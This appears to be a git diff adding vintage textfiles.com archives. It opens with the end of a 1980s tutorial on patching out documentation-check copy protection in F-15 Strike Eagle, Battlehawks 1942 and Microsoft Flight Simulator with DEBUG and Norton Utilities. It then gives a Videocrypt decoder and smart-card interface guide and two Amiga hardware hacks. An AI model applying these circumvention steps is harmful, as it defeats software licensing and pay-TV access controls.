Removing Doc Check Questions + + + ------------------------------------------------------------- + A new fad has recently started up with software vendors, it + involves the use of "Passwords" which are either stored in + the documentation or are actually the documentation itself. + Then when you reach a certain part of the program (Usually + the beginning) the program will ask for the password and you + have to look it up in the Docs before being allowed to con- + tinue. If the wrong password is entered, it will usually + drop you to DOS or take you to a Demo version of the program. + + This new form of copy protection is very annoying, but can + usually be cracked without too much effort, and the files + and the disk are usually in the standard DOS format. So now + we'll take a look at cracking the Doc check questions. + + First of all we'll crack the startup questions in F-15 + Strike Eagle by MicroProse. + ------------------------------------------------------------- + + + By: JP ASP + Title: F-15 Unprotect + + + + Make a copy of the original disk using the DOS DISKCOPY pro- + gram. + + >DISKCOPY A: B: + + Then insert the copy disk in the A drive and invoke DOS DE- + BUG. + + >DEBUG + + Now we'll [F]ill an area of memory with nothing (00). + + -F CS:100 L FEFF 0 + + Next we will [L]oad into address CS:0100 the data that is on + the A: disk (0) from sector 0 to sector 80. + + -l cs:100 0 0 80 + + Now lets [S]earch the data we loaded for the area where the + copy protection routine is. + + -s cs:100 l feff FA EB FD + + Then for each of the occurences listed, use the address DEBUG + returned in the [E]nter command below. + + 23 + + -e xxxx 90 90 90 + + ------------------------------------------------------------- + Here's the part we are interested in, it's where you change + all the autorization codes to a space. Notice how you can + use the [S]earch command to look for ASCII text. + ------------------------------------------------------------- + + -s cs:100 l feff "CHIP" + + Then for each occurance of "CHIP" use the address DEBUG re- + turned in the [F]ill command below. + + -F XXXX L F 20 + + Write out the modified data + + -W CS:100 1 0 80 + + Quit DEBUG + + -Q + + + You should now be able to DISKCOPY and boot from all copies + also just press the space bar when it ask for ANY authority + code and then press "ENTER". Now there is no need to remember + (or look up) any codes that are so finely tucked away in the + manual! + + END. + + + + + + + + + + + + + + + + + + + + + + + + 24 + ------------------------------------------------------------- + Here is a similar method that was used break the passwords in + the program BATTLEHAWKS 1945 by Lucasfilms. However Norton + Utilities is used to search for the passwords and change + them. + ------------------------------------------------------------- + + By: PTL + Title: BATTLEHAWKS-1945 Doc Check Crack + + + In keeping in line with their previous programs, Lucasfilms + has released yet another program which uses Doc Checks for + its means of copy protection, Battlehawks 1942. + + When you run this program, it first goes through a series of + graphic displays, then it goes through a series of questions, + asking what type of mission you want to fly, such as Train- + ing, Active Duty, or which side of the war you want to be on. + + Then right before the simulation begins, it shows you a pic- + ture of a Japanese Zero and ask you for a password which you + + are then supposed to get by looking up the picture of the + Zero in the User Manual and typing the corresponding password + in. After which it enters the simulation, in the event you + enter the wrong password, it puts you into a training mis- + sion. + + Removing the Doc Check in a program like this is usually + pretty easy. The ideal way to do it is to remove the Doc + Check routine itself, but if you don't have all day to debug + and trace around the code this might not be the best way. + For instance if you only have your lunch hour to work on it + (Like I did), then you need to use the standard Q.D.C.R.S. + (Quick Doc Check Removal System). + + How do you do a QDCRS? Well first of all, play around with + the program, find out what it will and will NOT accept as a + password. Most programs will accept anything, but a few + (Like Battlehawks) will only accept Alpha characters. + + Once you've learned what it likes, make an educated guess as + to what program the Doc Check routine is in. Then load that + program into Norton's Utility (NU). + + At this point, take a look at the passwords, and write down + the most unusual one that you can find (I'll explain later). + Now type that password in as the search string, and let NU + search through the file until it finds the password. Now a + couple of things can happen. + + 1. It only finds one occurrence + 2. It finds more than one occurrence + 3. It doesn't find any occurrence + + In the event of case 2 then YOU have to determine where the + passwords are stored, you can do this by opening your eyes + and looking. + + In the event of case 3, go to the kitchen and start a pot of + coffee, then tell you wife to go to bed without you, because + you have a "Special Project" that you have to finish tonight. + And by the way, Good Luck. You'll need it. + + Hopefully case 1 will occur, now you have to take a look at + the data and ask yourself 2 questions: + + 1. Are all the passwords the same length? + 2. Is there a set number of spaces between each pass- + word? + 3. Does the next password always start a certain number + of characters from the first character of the previ- + ous password? + + If you can answer yes to any of the above questions, you in + luck. All you have to do is change the passwords to spaces + + (If the program allows that, Battlehawks doesn't) or change + them to you favorite character. The letter X works good, it's + easy to type and easy to remember. + + If you can't answer yes to any of the questions then you ei- + ther need to bypass the Doc Check routine itself or you need + to be adventurous and experiment. Battlehawks will not follow + any of the above patterns, and your quickly running out of + time, so you'll have to try something, fast... + + So just wiped out all of the data area with X's, all the + passwords and associated "garbage" between them. Then saved + the changes and drop out of NU and into BH. Then when it ask + for the password, just filed the area with X's. Next thing + you know, you'll be escorting a bombing run on a Japanese + carrier. + + So, this one turned out to be fairly simple. Where you may + run into trouble is on Doc Checks that use a graphic system, + such as Gunship by MicroProse. When it comes to this type of + Doc Check, you almost have to bypass the routine itself. And + again, a good way to do this is with setting break points and + using the trace option in Debug. + + END. + + + + + + + + 25 + + ------------------------------------------------------------- + That was the easy version Doc Check crack, however there a + "Better" way to crack Doc Checks, is to bypass the routine + completely so the user can just press enter and not worry + about spaces. Let's take a lot at this method by looking at + a crack for the program, Yeager's Advanced Flight Trainer, by + Electronic Arts. + ------------------------------------------------------------- + + + By: PTL + Title: Yeager's Advanced Flight Trainer + + + + + + + + + + + + + + + + + 26 + Chapter 5 Cracking Self Booters + + + + ------------------------------------------------------------- + Now we'll take a look at cracking self booters. A few compa- + nies have found this to be the best copy protection scheme + for them, one of which is DataEast, makers of Ikari Warriors, + Victory Road, Lock-On, Karnov, etc... This posses a special + problem to the Amateur Cracker, since they seldom use stan- + dard DOS formats. So let's jump right in! + ------------------------------------------------------------- + + + This is the area where a "Higher than Normal" knowledge of + Assembly Language and DOS Diskette structures, so first of + all, the Basic's. + + + The Disk's Physical Structure + + Data is recorded on a disk in a series of concentric circles, + called Tracks. Each track if further divided into segments, + called Sectors. The standard double-density drives can + record 40 tracks of data, while the new quad-density drives + can record 80 tracks. + + However, the location, size, and number of the sectors within + a track are under software control. This is why the PC's + diskettes are known as soft-sectored. The characteristics of + a diskette's sectors (Their size, and the number per track) + are set when each track is formatted. Disk Formatting can be + done either by the operating system or by the ROM-BIOS format + service. A lot of self booters and almost all forms of copy + protection create unusual formats via the ROM-BIOS diskette + services. + + The 5 1/4-inch diskettes supported by the standard PC BIOS + may have sectors that are 128,256,512, or 1,024 bytes in + size. DOS, from versions 1.00 through 4.01 has consistently + used sectors of 512 bytes, and it is quite possible that this + will continue. + + Here is a table displaying 6 of the most common disk formats: + _____________________________________________________________ + + Type Sides Sectors Tracks Size(bytes) + _____________________________________________________________ + + S-8 1 8 40 160K + D-8 2 8 40 320K + S-9 1 9 40 180K + D-9 2 9 40 360K + QD-9 2 9 80 720K + QD-15 2 15 80 1,200K + _____________________________________________________________ + + + + S - Single Density + D - Double Density + QD - Quad Density + + Of all these basic formats, only two are in widespread use: + S-8 and D-9. The newer Quad Density formats are for the 3 + 1/2" and 5 1/4" high density diskettes. + + + The Disk's Logical Structure + + So, as we have already mentioned, the 5 1/4-inch diskette + formats have 40 tracks, numbered from 0 (the outside track) + through 39 (the inside track, closest to the center). On a + double sided diskette, the two sides are numbered 0 and 1 + (the two recording heads of a double-sided disk drive are + also numbered 0 and 1). + + The BIOS locates the sectors on a disk by a three-dimensional + coordinate composed of a track number (also referred to as + the cylinder number), a side number (also called the head + number), and a sector number. DOS, on the other hand, lo- + cates information by sector number, and numbers the sectors + sequentially from the outside to inside. + + We can refer to particular sectors either by their + three-dimensional coordinates or by their sequential order. + All ROM-BIOS operations use the three-dimensional coordinates + to locate a sector. All DOS operations and tools such as DE- + BUG use the DOS sequential notation. + + The BASIC formula that converts the three-dimensional coordi- + nates used by the ROM-BIOS to the sequential sector numbers + used by DOS is as follows: + + DOS.SECTOR.NUMBER = (BIOS.SECTOR - 1) + DIOS.SIDE + * SECTORS.PER.SIDE + BIOS.TRACK * SECTORS.PER.SIDE + * SIDES.PER.DISK + + And here are the formulas for converting sequential sector + numbers to three-dimensional coordinates: + + BIOS.SECTOR = 1 + DOS.SECTOR.NUMBER MOD SECTORS.PER.SIDE + BIOS.SIDE = (DOS.SECTOR.NUMBER \ SECTORS.PER.SIDE) + MOD SIDE.PER.DISK + BIOS.TRACK = DOS.SECTOR.NUMBER \ (SECTORS.PER.SIDE + * SIDES.PER.DISK) + + (Note: For double-sided nine-sector diskettes, the PC's + most common disk format, the value of SECTORS.PER.SIDE + is 9 and the value of SIDES.PER.DISK is 2. Also note + that sides and tracks are numbered differently in the + ROM-BIOS numbering system: The sides and tracks are num- + bered from 0, but the sectors are numbered from 1.) + + Diskette Space Allocation + + The formatting process divides the sectors on a disk into + four sections, for four different uses. The sections, in the + order they are stored, are the boot record, the file alloca- + tion table (FAT), the directory, and the data space. The + size of each section varies between formats, but the struc- + ture and the order of the sections don't vary. + + The Boot Record: + + This section is always a single sector located at sector + 1 of track 0, side 0. The boot record contains, among other + things, a short program to start the process of loading the + operating system on it. All diskettes have the boot record + on them even if they don't have the operating system. Asisde + from the start-up program, the exact contents of the boot + record vary from format to format. + + The File Allocation Table: + + The FAT follows the boot record, usually starting at + sector 2 of track 0, side 0. The FAT contains the official + record of the disk's format and maps out the location of the + sectors used by the disk files. DOS uses the FAT to keep a + record of the data-space usage. Each entry in the table con- + tains a specific code to indicate what space is being used, + what space is available, and what space is unusable (Due to + defects on the disk). + + The File Directory: + + The file directory is the next item on the disk. It is + used as a table of contents, identifying each file on the + disk with a directory entry that contains several pieces of + information, including the file's name and size. One part of + the entry is a number that points to the first group of sec- + tors used by the file (this number is also the first entry + for this file in the FAT). + + The Data Space: + + Occupies the bulk of the diskette (from the directory + through the last sector), is used to store data, while the + other three sections are used to support the data space. + Sectors in the data space are allocated to files on an + as-needed basis, in units known as clusters. The clusters + are one sector long and on double-sided diskettes, they are a + pair of adjacent sectors. + + + + (From here on I'll continue to describe the basics of DOS + disk structures, and assembly language addressing technics. + + + ------------------------------------------------------------- + Here is a simple routine to just make a backup copy of the + Flight Simulator Version 1.0 by Microsoft. I know the latest + version is 3.x but this version will serve the purpose of + demonstrating how to access the data and program files of a + selfbooter. + ------------------------------------------------------------- + + + By: PTL + Title: Microsoft Flight Simulator 1.00 Unprotect + + + This procedure will NOT convert the Flight Simulator disk to + files that can be loaded on a hard drive. But... it will + read off the data from the original and put it onto another + floppy. And this should give you an idea of how to read data + directly from a disk and write it back out to another disk. + + First of all take UNFORMATTED disk and place it in drive B:. + This will be the target disk. + + Now place your DOS disk (which has Debug) into drive A:, or + just load Debug off you hard disk. + + A>DEBUG + + Then we are going to enter (manually) a little program to + load the FS files off the disk. + + -E CS:0000 B9 01 00 BA 01 00 BB 00 + 01 0E 07 06 1F 88 E8 53 + 5F AA 83 C7 03 81 FF 1C + 01 76 F6 B8 08 05 CD 13 + 73 01 90 FE C5 80 FD 0C + 76 E1 90 CD 20 + + -E CS:0100 00 00 01 02 00 00 02 02 00 00 03 02 + 00 00 04 02 00 00 05 02 00 00 06 02 + 00 00 07 02 00 00 08 02 + + Next we'll [R]eset the IP Register by typing. + + -R IP + + And then typing four zeros after the address prefix. + + xxxx:0000 + + Next insert the original Flight Simulator disk into drive A: + and we'll run our little loader. + + -G =CS:0000 CS:22 CS:2A + + Now enter a new address to load from. + + -E CS:02 0E + -E CS:27 19 + + And run the Loader again. + + -G =CS:0000 CS:22 CS:2A + + New address + + -E CS:02 27 + -E CS:27 27 + + Run Loader + + -G =CS:0000 CS:22 CS:2A + + Here we'll do some [L]oading directly from the disk our- + selves. + + -L DS:0000 0 0 40 + + And the in turn, write it back out to the B: (1) drive + + -W DS:0000 1 0 40 + + Etc... + + -L DS:0000 0 40 28 + -W DS:0000 1 70 30 + -L DS:0000 0 A0 30 + -W DS:0000 1 A0 30 + -L DS:0000 0 138 8 + -W DS:0000 1 138 8 + + When we are all through, [Q]uit from debug and you should + have a backup copy of the Flight Simulator. + + -Q + + And that's all there is to it. + + END. \ No newline at end of file diff --git a/textfiles.com/computers/adapter.txt b/textfiles.com/computers/adapter.txt new file mode 100644 index 00000000..078ee03b --- /dev/null +++ b/textfiles.com/computers/adapter.txt @@ -0,0 +1,382 @@ + +How to connect a PC to a Videocrypt decoder +------------------------------------------- + +Markus Kuhn -- 1994-06-19 + + +The easiest way to connect your PC to a Videocrypt pay-TV decoder is to +use the card slot as an interface and connect it with a voltage +converter (MAX232) and a TTL open collector driver (74LS07) to the +RS-232 serial port. This way, you don't even have to open the decoder +and the PC can now act as a smart card. + +WARNING: In order to build the adapter described below, you will at + least require some basic hobby electronics experience. If + you don't understand, how the described circuitry works, + better don't use it! Although the described procedure is + relatively secure, serious errors might in the worst case + damage both your PC and your TV system. + +The chip cards used by the Videocrypt pay-TV system follow exactly the +specification ISO 7816 (you might find this international standard in a +good library, if you are interested in more details). Also, the +protocol is the "asynchronous half duplex T=0 protocol" with "active +low reset" and "inverse convention" as defined in this standard. The +following description may also be used in order to connect computers to +other ISO 7816 compatible chip card systems (e.g. GSM mobile phones or +other pay-TV decoding systems) if they also use asynchronous +transmission. For smart card systems which use synchronous transmission +(e.g. most phone cards) the interface described here will need some +modifications. + +According to ISO, a chip card is 85.60 mm long, 53.98 mm high, 0.76 mm +thick and the edges are rounded with a radius of 3.18 mm. It has eight +defined contact areas (C1 - C8 in the diagram below), each of which is +at least 2 mm wide and 1.7 mm heigh: + + + ______________________________________ + / \ + | | + | | + | C1 C5 | + | C2 C6 | + | C3 C7 | + | C4 C8 | + | | + | | + | | + \________________________________________/ + + + +These contacts have the following purpose: + + + C1 VCC Supply voltage (+5 V, max. 200 mA) + C2 RST Reset signal + C3 CLK Clock signal + C4 - reserved + C5 GND Ground + C6 VPP Programming voltage (5-25 V) + C7 I/O Data input/output + C8 - reserved + + +The following table gives the precise location of the contact areas. +These areas are only minimum areas, the actual contacts might be larger +but must of course be properly isolated from each other. + +In the following table, + + A represents the maximum distance between the card's left + edge and the contact area's left edge, + B represents the minimum distance between the card's left + edge and the contact area's right edge, + C represents the maximum distance between the card's top + edge and the contact area's upper edge, + D represents the minimum distance between the card's top + edge and the contact area's lower edge. + + + A B C D + ----------------------------------------- + C1 10.25 12.25 19.23 20.93 + C2 10.25 12.25 21.77 23.47 + C3 10.25 12.25 24.31 26.01 + C4 10.25 12.25 26.85 28.55 + C5 17.87 19.87 19.23 20.93 + C6 17.87 19.87 21.77 23.47 + C7 17.87 19.87 24.31 26.01 + C8 17.87 19.87 26.85 28.55 + + +Older card systems (defined in a French AFNOR standard) had these +contacts located higher (distance from the top between 9.07 mm and +18.39 mm, distance from the left identical). As some decoders support +both contact area alternatives, make sure that this old contact area is +properly isolated or you'll produce a short circuit when inserting your +card. You may have noticed, that the contacts are arranged in the usual +1/10 inch (= 2.54 mm) system (i.e. like the pins of a 8-pin DIL chip). + +You can produce your card adapter by making a PCB with contact areas at +the above listed locations. The PCB must have precisely the thickness +and width of a real card, but it may be longer, so that you can locate +the interface electronics on the part which remains outside the slot. +Cards are inserted in most decoders with the contacts on the bottom +side. Normal PCBs are about 1.3 mm think and won't fit into the slot. +Either you get a PCB which is about 0.8 mm thick or you make it +thinner, e.g. by using a sander machine. Perhaps you find also ready to +use test cards with connectors instead of producing your own or you +simply open the decoder, clamp contacts to the resistors near the card +slot and insert a normal plastic card in order to activate the +card-presence switch (this is NOT recommended: there are unisolated 230 +V parts inside the decoder and they could kill you if you are not very +carefull!!!). + +The adapter will only need the card contacts I/O, GND, RST and VCC. On +the RS-232 side, the following contacts will be used: + + Sub-D 25-pin Sub-D 9-pin + --------------------------------------------------------- + TxD 2 3 transmit data + RxD 3 2 receive data + RTS 4 7 request to send + CTS 5 8 clear to send + DSR 6 6 data set ready + GND 7 5 ground + DCD 8 1 carrier detect (here: reset) + DTR 20 4 data terminal ready + + +The pins DTR, DSR and CTS are not actually needed, they are just +connected together in the adapter, so that defined levels are available +on them because some software might need this. RTS is connected to an +unused MAX232 input and the corresponding TTL output might be used for +generating the reset signal if the adapter is used for connecting a PC +to a card instead of an decoder. + +The following components are necessary for the adapter + + 1 x 0.5-0.8 mm PCB single sided or test card + 1 x IC Maxim MAX232CPE (or Linear Technology LT1081CN) + 1 x IC 74LS07 (or 7407) + 5 x capacitors 1 uF (or higher), 16 V + 1 x female Sub-D connector (9 or 25-pin) + 1 x card slot (optional) + +These components cost together less than 20 DM. + +The MAX232 converts the RS-232 levels (about +10 and -10 V) to TTL +voltage (0 and +5 V) and vice versa without requiring anything else +than +5 V power supply. This chip contains two TTL->RS-232 and two +RS-232->TTL drivers and needs four external 1 uF capacitors in order +to generate the RS-232 voltage internally. The adapter electronic gets +its power supply from the decoder's VCC line or you can use an external +5 V supply if you wish. + +The card slot's RST line is connected using one of the TTL->RS-232 +drivers in the MAX232 to DCD, so that the software and the decoder can +easily resynchronize in case of a protocol error. + +The I/O line is a bidirectional half-duplex asynchronous TTL level +serial port that is operated in a Videocrypt system with 9600 bits/s. +We can connect this line to a MAX232 TTL input driver (which is +connected to RxD and sends bytes to the PC) in order to receive data +from the decoder. The TxD signal is converted in the MAX232 to TTL +level and is connected with an open collector TTL driver to I/O. This +open collector driver (one of six in the 74LS07) has a high impedance +output during idle state and 1 and is connected to GND during a 0 on +it's input. As there is already a pull-up resistor to +5 V on I/O in +the decoder, this circuitry guarantees, that the adapter is in high +impedance state if the TxD line is idle and delivers the correct +voltage if the PC sends bytes and the decoder is in reception mode. As +we don't connect totem-pole or tristate outputs to I/O, a short circuit +should be impossible in the adapter. + +The following diagram describes the whole interface: + + + +-------------+ + + +-----------|1 V 16|---+---o +5V (VCC) + +| +| | === + === +5V o-||-|2 MAX232 15|---+---o GND (card & RS-232) + | | | + +-----------|3 +---14|----o DCD +-<-o DTR + + | | | | + +---||---|4 | +-13|----o RTS +->-o DSR + | | | v | | + +--------|5 | +-12|- (unused TTL output) +->-o CTS + + | | | + GND o-||-|6 +-<-11|----o RST + | | + RxD o----|7 ---<--- 10|-------------------+----o I/O + | | |\ | + TxD o----|8 --->--- 9|--------------| |--+ + +-------------+ 1|/ 2 + 74LS07 + At the MAX232, pin 2 delivers + +10 V and pin 6 delivers -10 V. (also connected to 74LS07: + pin 7=GND, pin 14=VCC) + + +Pay attention to the polarity of the capacitors (marked with a + in the +diagram next to each capacitor)! The -->-- symbols in the AX232 +diagram above indicate the voltage converters inside the chip. You +might want to add an LED and a resistor (between 220 and 1k ohm) +between VCC and GND so that you can see when the decoder activates the +interface. If you can't live without blinking bits, then add a LED and +a resistor from VCC to I/O. The capacitor between VCC and GND is not +absolutely necessary, but recommended especially if you add other +circuitry on the board (e.g. the quartz oscillator described below). + +As a side effect of this simple interface design, every byte sent by +the PC is at the same time also received by the PC. Consequently, you +can test the circuit with a terminal emulator and external +5 V supply +by switching of local echo: if you still see every typed character +immediately on the screen, the interface should be all right. Software +must be capable of dealing with this echo from the interface. As +specified in the ISO standard, the decoder activates VCC only shortly +before a reset and deactivates VCC again if an answer-to-reset packet +isn't received from the card in time after the reset signal. + +A few additional hints: + +If you have a larger distance between the PC an the decoder, then +locate the adapter electronic near the decoder, because the RS-232 +interface is much more suitable for long cables than the TTL signals. +Cables of 12 m length have sucessfully been used and you shouldn't have +problems with RS-232 cables up to 25 m length and more. + +You can also use this adapter circuit to allow a PC to listen to the +data traffic between a decoder and a real card. Just connect the real +card and the adapter parallel to the decoder and don't let the PC +software transmit anything. Suitable card slots are available for +little money from various manufacturers (see below for addresses). +Videocrypt uses the inverse convention data format, i.e., you have to +reverse and invert the bits in each byte in the PC software in order to +get the correct byte value. For more details about the protocol, check +ISO 7816-3. + +There are many alternative ways to build this interface if you don't +have some of the components available. E.g. the MAX232 could be +replaced by the fully compatible LT1081 from Linear Technology. The +circuit still works fine if you use higher capacitors than 1 uF (e.g. +my prototype worked fine with 4 22 uF types which were left from a +previous project), but use equally sized capacitors. If you use the pin +compatible MAX220 (a low power version) instead of the MAX232, then use +capacitors with 10 uF or higher. The MAX232 should be the easiest +available one of these chips. If it is more convenient for your layout, +then you can use instead of the 1->2 driver in the 74LS07 one of the +remaining 5 drivers at the pins 3->4, 5->6, 9->8, 11->10 and 13->12. If +your local electronic store doesn't have a 74LS07 or 7407, then use +e.g. two of the six open collector inverters in a 74LS05 (same pin +assignment as the 74LS07) in series and a 2.2k pull-up resistor to VCC +between them. Peoples have also suggested quick-and-dirty designs where +the 74LS07 open-collector driver is replaced by a 100 ohm resistor and +the MAX232 by a CMOS inverter. + +If you don't have the experience to etch your own PCB (it's not very +difficult) or don't know someone who does, then you could solder the +components in a universal raster PCB or plug them into an experimental +board. Then produce just a simple PCB with only the ISO card contacts +and connections to outside the decoder by mechanically removing the +thin copper layer with a good knive between the 4 contacts and lines. + +Peoples have also suggested to use an empty German phone card, which +also has ISO contacts. Remove the integrated chip from the other +non-contact side, test whether the contacts are now isolated from each +other and use a special conductive ink you'll find in an electronics +store in order to draw connections to the end of the card were you +connect wires. I haven't tested this and don't know how well it works, +but you might also consider it. If you ask dealers who sell Videocrypt +clone cards, you might also get a suitable PCB with card contacts for +little money. + +You can use the same circuit with a few modifications in order to +connect a PC to a smart card. This allows you to use the PC in order to +emulate a decoder from the card's point of view. + +Just connect the card's RST input to pin 12 of the MAX232 so that you +can control the RST line with the RS-232 RTS signal. Add a 20k pull- +upresistor from the card's I/O line to VCC. In addition, you'll have to +generate a 3.57 MHz CLK signal for the card. If you use other +frequencies, remember that the time for one protocol bit is 372 CLK +periods and you'll have to adjust the bits/sec rate. Either you'll find +a complete 3.5 or 3.579545 MHz quartz oscillator which delivers a TTL +signal or you build one like the following circuit using a 3.579545 MHz +quartz (easily available, because each NTSC TV set contains one) and 2 +of the 6 CMOS inverters in a 74HC04. I've also tried a 74HCT04 and a +4069, but they both are less suitable. And of course you'll need an +external regulated +5 V power supply (a decoder will give you only VCC +and CLK while it is talking to a card). In order to protect both the +card and the adapter, it might be a good idea to put a 10 ohm resistor +in all lines to the card (and perhaps even protection diodes to VCC and +GND). If you don't already have a VCC/GND capacitor near the 74HC04, +then add 0.1 uF between VCC and GND. + + + 1M 2.2k 3|\4 10 + +-/\/\/--+----/\/\/-----+--| o-----+-----/\/\/---o CLK + | |2 | |/ | + | -o- | |100 pF + | /_____\ | === + | |1 | | + | | 3.579545 MHz | | + | | +--+ | - (also connect to 74HC04: + +--------+---| | | |---+ GND pin 5,7,9,11,13=GND, + | +--+ | pin 14=VCC=+5 V) + |27pF |27pF + === === + | | + - - + GND GND + +You can easily build a universal device that can be operated in two +modes by changing the position of two jumpers: + + a) In the first mode, you have a PC<->decoder adapter. The PCB is plugged + into the card slot of a decoder, and either you let the PC talk + to the decoder or you put a card into the additional slot on your + device and use the PC in order to listen to the traffic between + card and decoder. Use the jumpers in order to connect pins CLK and + RST of your card slot to those of the decoder. + + b) In the second mode of operation, you have a PC<->card adapter. The + device is not connected with the decoder and you have to attach a + +5 V power supply. The jumpers are switched, so that your card slot + has its CLK pin connected to the output of the above quartz oscillator + and the RST pin to pin 12 of the MAX232. As in this mode the PCB + isn't plugged into the decoder, it is convenient to have tiny + feets attached to the PCB so that you can put it on a table. + +Now you've built a cheap and flexible debugging tool for all ISO 7816 +compatible smart card systems that use an asynchronous protocol. Other +ideas are to add a chip socket for a microcontroller (e.g. a PIC16C84 +from Microchip or a 8032+EPROM from Intel) parallel to the additional +card slot and to add pins where you can easily connect an oscilloscope. +This allows you to debug card software for microcontrollers easily. +Feel free to produce and sell such a device, but if you do it +commercially, please be nice and don't forget to send me a free one, +too. :-) + +ISO 7816 chip card connectors are e.g. available from: + + Amphenol-Tuchel Electronics GmbH + August-Haeusser-Str. 10 + D-74080 Heilbronn + Germany + + phone +49 7131 486-0 + fax +49 7131 486-323 + +A few final remarks about the security of the adapter: + +Normally, both the RS-232 interface and the decoder slot should not be +harmed by short circuits, but be careful. Also try to avoid +electrostatic voltage (e.g. generated by walking on a suitable carpet) +near the interface, because discharges cause easily decoder or PC +crashes and could theoretically even harm the hardware (especially CMOS +chips like the 74HC04). Before connecting the decoder and the PC the +first time, you might want to check the voltage between the two GND +lines. In correct installations, the difference of the GND potentials +is very low (below 1 V), but someone has reported up to 50 V (high +impedance only). Most TV sets, VCRs, SAT receivers and decoders are not +connected with the earth line, so their GND potential is floating or +sometimes only defined by e.g. the shielding of the antenna cable. If +your antenna system is not correctly installed, the shield might also +not be grounded. One quick solution might be to switch off all +components and then connect first the RS-232 GND line to e.g. the GND +in the SCART connector or the GND at an audio connector of your decoder +before connecting anything else. You might also design the ISO contacts +on the PCB so that GND touches all pins at first when the PCB is +inserted in the card slot. The only really secure protection between +your PC and your decoder would be to use an isolating RS-232 driver +(e.g. you might want to check data sheets of Maxim's MAX250/251/252 +chips which offer RS-232 protection up to 1500 V), but under normal +circumstances you won't need this. + +Use this circuit at your own risk and please don't blame me if anything +doesn't work or produces only smoke and noise. Good luck ... ;-) + diff --git a/textfiles.com/computers/add5.25drive.txt b/textfiles.com/computers/add5.25drive.txt new file mode 100644 index 00000000..3cafaa0d --- /dev/null +++ b/textfiles.com/computers/add5.25drive.txt @@ -0,0 +1,127 @@ + + + + HOOKING A 5.25" DRIVE TO YOUR AMIGA + + by Les Ayling + + ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| + + Hooking up a standard 80 track, double-sided, 5 1/4" floppy disk drive + as drive df2: or df3: + + Looking at the connector from the back side of the external drive, the + pin out is as follows: + + + 712 11 10 9 8 7 6 5 4 3 2 1 + + + 23 22 21 20 19 18 17 16 15 14 13 + + + 34 Pin edge connector pin-out is as follows: + + + 34 32 30 28 26 24 22 20 18 16 14 12 10 8 6 4 2 + + + 33 31 29 27 25 23 21 19 17 15 13 11 9 7 5 3 1 + + + + Wire a DB25 (RS-232) connector with pins 13 and 25 cut off per the + following configuration: + + + 34 Pin 23 Pin + + ----------------- + + 34 --------- 1 + + 32 --------- 13 + + 30 --------- 2 + + 28 --------- 14 + + 26 --------- 15 + + 24 ---7---- 16 + + 22 --------- 17 + + 20 --------- 18 + + 18 --------- 19 + + 16 --------- + + 14 --------- 9 + + 12 --------- 21 + + 10 -- tie to ground, keep the motor running all the time + + 8 --------- 22 + + 6 --------- 20 + + 4 --------- + + 2 --------- + + all odd numbered pins of the 34 pin connector should be tied to pins + 3, 4, 5, 6 & 7 of the 23 Pin connector (grounds). + + + In addition, pin 11 of the 23 pin connector should be wired to a + momentary push-button that can be activated whenever a diskette is + removed and replaced with another. This tells the DOS that a different + diskette has been inserted into the drive. Simply change the diskette, + push the button and hold until DOS accesses the drives. The switch may + then be released. This function is necessary due to the fact that the + DOS seems to read the directory of the current diskette into ram, and + unless the DOS is told of another diskette being used, it will either + ask you to replace the diskette that was in the drive or write to the + diskette using parameters from the previous disk. This, of course, is + very undesirable. + + + Also, note that the drive must be connected when booting DOS or it + will not be noted as being on-line. The diskette does not have to be + inserted, just the drive plugged in. + + + Do not make any connections to the 23 pin connector, pins 23 or pin + 12. These pins provide power to the Amiga drive 1 and may not be used + to power an external 5 1/4" drive. An external power supply must be + used. + + + The 5 1/4" drive selection header may be programmed as drive for drive + 2. Drive 1 selects as DF2: and drive 2 selects as DF3:. + + + A motor on latch circuit may be built to eliminate the motor + continuously turning, however, the way indicated above is the quickest + and simplest method to get another drive on-line. + + + After this procedure is completed, the 5 1/4" drive may be used just + as any normal Amiga drive. + + + Considering the $295.00 list price of the Amiga drives, versus about + $50 dollar price of 5 1/4" drives, it's a real bargain. + + + *** As always, with any hardware project - + (1) - if you are not sure of what I am talking about, get + knowledgeable help and + (2) - TRIPLE CHECK your work before plugging in the new drive. + + + + |||||||||||||||||||||||| END OF ADD_5.25_DRIVE |||||||||||||||||||||| diff --git a/textfiles.com/computers/add512kb b/textfiles.com/computers/add512kb new file mode 100644 index 00000000..f996cc09 --- /dev/null +++ b/textfiles.com/computers/add512kb @@ -0,0 +1,79 @@ +HOW TO INSTALL 1MB CHIP INTO AN AMIGA 500 ON THE MOTHERCARD! + +Note. This hack works just on Rev. 6A Amigas (or higher!) + +You will need the following: + + 4 memory chips (44267 or pincompatible) + A LOW WATTAGE solder iron + +PLEASE READ ALL TEXT CAREFULLY BEFORE YOU DOES ANYTHING! + +Now open you Amiga (it's a hell to open those fucking nonstandard screws!) +(When you open Ya Amiga ya worrenty will go to hell, but if ya are a real +hardware hacker you don't mind!!) then try to find where the memory chips +are located! (under the keyboard on the left side where the memory expansion +should be located!) there will you find 4 EMPTY places for 4 chips! just +solder the new chips there! (with the SAME direction as the other chips +already have otherwise bad things CAN happen!) +Now locate jumper JP7A and cut the connections from ALL three bases! +then find jumper JP2 and cut the connections and solder a connection +between the middle one and that one on the top! so the jumpers should +be connected like this: + +JP7A: + O + + O + + O + + (no connection at all!) + + +JP2: + + O + | + O + + O + + (The Top one and the middle one soldered together!) + + + +and that should be it! (test the command AVAIL to check how much CHIP/FAST +mem you have! you should now have 104000 or something like that in CHIP +mem! (if you have downloaded ths from a BBS that was packed with LHARC by +me then AVAIL will be in this file too!) + + + +NOTE: YOU CAN'T HAVE A MEMORY EXPANSION (LIKE THE A501) IN THE INTERNAL +PORT IF YOU INSTALL THIS MEMORY!!!!!!!!! IT GOT TO BE A EXTERNAL MEMORY +EXPANSION!!!!!!!!! + +I WILL NOT TAKE ANY RESPONSIBILITY IF ANYTHING GOES WRONG FOR YOU! + === + +If you have something to ask me feel free to call those BBSes and leave a +message to me: (Send the messy to John Hertell) + +The Golden Arrow +46 26 275710 (-2400 BAUD) (I'm a CO-SYSOP there!) +Checkpoint Charlie +46 31 463582 (HST+) +Power Station +46 522 29360 (HST+) + +Or in VIDEOTEX in Sweden send a message to: 52000161-1 + +or call my voice line on +46 522 75764 +or a letter to: John Hertell, Box 5074, 451 05 Uddevalla, Sweden + +Have fun with your 1MB CHIP AMIGA! (on the motherboard) + +AGAIN i must say that this hack ONLY works if you have a REV. 6 AMIGA! +(they have a SUPER FAT AGNUS already!) The Superfat Agnus is called: +8372A! (it's that strange chip who looks like a box!) + + +Signed Chucky of The Gang! diff --git 